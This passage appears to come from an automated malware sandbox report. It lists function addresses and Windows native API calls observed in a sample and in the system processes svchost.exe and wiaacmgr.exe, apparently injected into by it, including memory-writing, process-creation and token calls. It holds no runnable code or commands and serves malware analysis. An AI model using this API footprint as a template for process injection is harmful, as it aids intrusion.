                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046E2B60 NtClose,LdrInitializeThunk,6_2_046E2B60
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046E2BE0 NtQueryValueKey,LdrInitializeThunk,6_2_046E2BE0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046E2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_046E2BF0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046E2BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_046E2BA0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046E35C0 NtCreateMutant,LdrInitializeThunk,6_2_046E35C0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046E39B0 NtGetContextThread,LdrInitializeThunk,6_2_046E39B0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046E2C00 NtQueryInformationProcess,6_2_046E2C00
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046E2CF0 NtOpenProcess,6_2_046E2CF0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046E2CC0 NtQueryVirtualMemory,6_2_046E2CC0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046E2D00 NtSetInformationFile,6_2_046E2D00
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046E2DB0 NtEnumerateKey,6_2_046E2DB0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046E2E30 NtWriteVirtualMemory,6_2_046E2E30
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046E2EA0 NtAdjustPrivilegesToken,6_2_046E2EA0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046E2F60 NtCreateProcessEx,6_2_046E2F60
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046E2FA0 NtQuerySection,6_2_046E2FA0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046E2F90 NtProtectVirtualMemory,6_2_046E2F90
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046E2AB0 NtWaitForSingleObject,6_2_046E2AB0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046E2B80 NtQueryInformationFile,6_2_046E2B80
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046E3010 NtOpenDirectoryObject,6_2_046E3010
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046E3090 NtSetValueKey,6_2_046E3090
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046E3D70 NtOpenThread,6_2_046E3D70
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046E3D10 NtOpenProcessToken,6_2_046E3D10
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_006A95B0 NtCreateFile,6_2_006A95B0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_006A9720 NtReadFile,6_2_006A9720
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_006A9810 NtDeleteFile,6_2_006A9810
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_006A98B0 NtClose,6_2_006A98B0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_006A9A20 NtAllocateVirtualMemory,6_2_006A9A20
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_0094D5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_0094D5EB
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_00941201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00941201
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_0094E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_0094E8F6
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_009520460_2_00952046
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_008E80600_2_008E8060
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_009482980_2_00948298
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_0091E4FF0_2_0091E4FF
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_0091676B0_2_0091676B
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_009748730_2_00974873
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_0090CAA00_2_0090CAA0
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_008ECAF00_2_008ECAF0
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_008FCC390_2_008FCC39
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_00916DD90_2_00916DD9
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_008E91C00_2_008E91C0
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_008FB1190_2_008FB119
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_009013940_2_00901394
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_009017060_2_00901706
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_0090781B0_2_0090781B
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_009019B00_2_009019B0
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_008E79200_2_008E7920
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_008F997D0_2_008F997D
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_00907A4A0_2_00907A4A
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_00907CA70_2_00907CA7
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_00901C770_2_00901C77
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_00919EEE0_2_00919EEE
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_0096BE440_2_0096BE44
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_00901F320_2_00901F32
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_00BE2DB80_2_00BE2DB8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00418A231_2_00418A23
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004030101_2_00403010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042F1731_2_0042F173
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041024A1_2_0041024A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004102531_2_00410253
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004012201_2_00401220
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402B801_2_00402B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004043B51_2_004043B5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004104731_2_00410473
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E4731_2_0040E473
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00416C101_2_00416C10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00416C131_2_00416C13
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004024D01_2_004024D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E5C31_2_0040E5C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E5B81_2_0040E5B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004027401_2_00402740
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033FA3521_2_033FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034003E61_2_034003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334E3F01_2_0334E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E02741_2_033E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C02C01_2_033C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DA1181_2_033DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033301001_2_03330100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C81581_2_033C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F41A21_2_033F41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034001AA1_2_034001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F81CC1_2_033F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D20001_2_033D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033407701_2_03340770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033647501_2_03364750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333C7C01_2_0333C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335C6E01_2_0335C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033405351_2_03340535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034005911_2_03400591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E44201_2_033E4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F24461_2_033F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033EE4F61_2_033EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033FAB401_2_033FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F6BD71_2_033F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333EA801_2_0333EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033569621_2_03356962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033429A01_2_033429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0340A9A61_2_0340A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334A8401_2_0334A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033428401_2_03342840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033268B81_2_033268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E8F01_2_0336E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03360F301_2_03360F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E2F301_2_033E2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03382F281_2_03382F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B4F401_2_033B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033BEFA01_2_033BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03332FC81_2_03332FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033FEE261_2_033FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340E591_2_03340E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03352E901_2_03352E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033FCE931_2_033FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033FEEDB1_2_033FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DCD1F1_2_033DCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334AD001_2_0334AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03358DBF1_2_03358DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333ADE01_2_0333ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340C001_2_03340C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E0CB51_2_033E0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03330CF21_2_03330CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F132D1_2_033F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332D34C1_2_0332D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0338739A1_2_0338739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033452A01_2_033452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335D2F01_2_0335D2F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E12ED1_2_033E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335B2C01_2_0335B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0340B16B1_2_0340B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332F1721_2_0332F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0337516C1_2_0337516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334B1B01_2_0334B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F70E91_2_033F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033FF0E01_2_033FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033EF0CC1_2_033EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033470C01_2_033470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033FF7B01_2_033FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033856301_2_03385630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F16CC1_2_033F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034095C31_2_034095C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DD5B01_2_033DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033FF43F1_2_033FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033314601_2_03331460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033FFB761_2_033FFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335FB801_2_0335FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B5BF01_2_033B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0337DBF91_2_0337DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B3A6C1_2_033B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033FFA491_2_033FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F7A461_2_033F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DDAAC1_2_033DDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03385AA01_2_03385AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E1AA31_2_033E1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033EDAC61_2_033EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D59101_2_033D5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033499501_2_03349950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335B9501_2_0335B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AD8001_2_033AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033FFF091_2_033FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033FFFB11_2_033FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03341F921_2_03341F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03303FD21_2_03303FD2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03303FD51_2_03303FD5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03349EB01_2_03349EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F7D731_2_033F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F1D5A1_2_033F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03343D401_2_03343D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335FDC01_2_0335FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B9C321_2_033B9C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033FFCF21_2_033FFCF2
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_047624466_2_04762446
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_047544206_2_04754420
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0475E4F66_2_0475E4F6
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046B05356_2_046B0535
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046B850D6_2_046B850D
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_047705916_2_04770591
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046CC6E06_2_046CC6E0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046B07706_2_046B0770
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046D47506_2_046D4750
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046AC7C06_2_046AC7C0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_047420006_2_04742000
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_047381586_2_04738158
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046A01006_2_046A0100
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0474A1186_2_0474A118
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_047681CC6_2_047681CC
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_047641A26_2_047641A2
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_047701AA6_2_047701AA
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_047502746_2_04750274
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_047302C06_2_047302C0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0476A3526_2_0476A352
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_047703E66_2_047703E6
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046BE3F06_2_046BE3F0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046B0C006_2_046B0C00
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046A0CF26_2_046A0CF2
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_04750CB56_2_04750CB5
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046BAD006_2_046BAD00
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0474CD1F6_2_0474CD1F
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046AADE06_2_046AADE0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046C8DBF6_2_046C8DBF
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046B0E596_2_046B0E59
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0476EE266_2_0476EE26
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0476EEDB6_2_0476EEDB
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0476CE936_2_0476CE93
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046C2E906_2_046C2E90
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_04724F406_2_04724F40
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_04752F306_2_04752F30
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046F2F286_2_046F2F28
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046D0F306_2_046D0F30
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046A2FC86_2_046A2FC8
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0472EFA06_2_0472EFA0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046BA8406_2_046BA840
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046B28406_2_046B2840
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046DE8F06_2_046DE8F0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046968B86_2_046968B8
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046C69626_2_046C6962
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046B29A06_2_046B29A0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0477A9A66_2_0477A9A6
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046AEA806_2_046AEA80
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0476AB406_2_0476AB40
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_04766BD76_2_04766BD7
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046A14606_2_046A1460
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0476F43F6_2_0476F43F
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_047675716_2_04767571
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_047795C36_2_047795C3
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0474D5B06_2_0474D5B0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046F56306_2_046F5630
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_047616CC6_2_047616CC
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0476F7B06_2_0476F7B0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0476F0E06_2_0476F0E0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_047670E96_2_047670E9
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046B70C06_2_046B70C0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0475F0CC6_2_0475F0CC
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046E516C6_2_046E516C
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0469F1726_2_0469F172
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0477B16B6_2_0477B16B
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046BB1B06_2_046BB1B0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_047512ED6_2_047512ED
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046CD2F06_2_046CD2F0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046CB2C06_2_046CB2C0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046B52A06_2_046B52A0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0469D34C6_2_0469D34C
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0476132D6_2_0476132D
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046F739A6_2_046F739A
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_04729C326_2_04729C32
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0476FCF26_2_0476FCF2
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_04767D736_2_04767D73
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046B3D406_2_046B3D40
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_04761D5A6_2_04761D5A
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046CFDC06_2_046CFDC0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046B9EB06_2_046B9EB0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0476FF096_2_0476FF09
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_04673FD56_2_04673FD5
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_04673FD26_2_04673FD2
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0476FFB16_2_0476FFB1
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046B1F926_2_046B1F92
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0471D8006_2_0471D800
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046B38E06_2_046B38E0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046B99506_2_046B9950
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046CB9506_2_046CB950
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_047459106_2_04745910
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_04723A6C6_2_04723A6C
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_04767A466_2_04767A46
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0476FA496_2_0476FA49
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0475DAC66_2_0475DAC6
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046F5AA06_2_046F5AA0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_04751AA36_2_04751AA3
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0474DAAC6_2_0474DAAC
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0476FB766_2_0476FB76
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_04725BF06_2_04725BF0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046EDBF96_2_046EDBF9
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046CFB806_2_046CFB80
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_006920E06_2_006920E0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0068CFC06_2_0068CFC0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0068CFB76_2_0068CFB7
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_006811226_2_00681122
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0068B1E06_2_0068B1E0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0068D1E06_2_0068D1E0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0068B3256_2_0068B325
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0068B3306_2_0068B330
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_006957906_2_00695790
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0069397D6_2_0069397D
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_006939806_2_00693980
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_006ABEE06_2_006ABEE0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0456E76C6_2_0456E76C
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0456E2B56_2_0456E2B5
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0456E3D56_2_0456E3D5
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0456D8386_2_0456D838
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0456CAD86_2_0456CAD8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0332B970 appears 262 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 033BF290 appears 103 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03375130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 033AEA12 appears 86 times
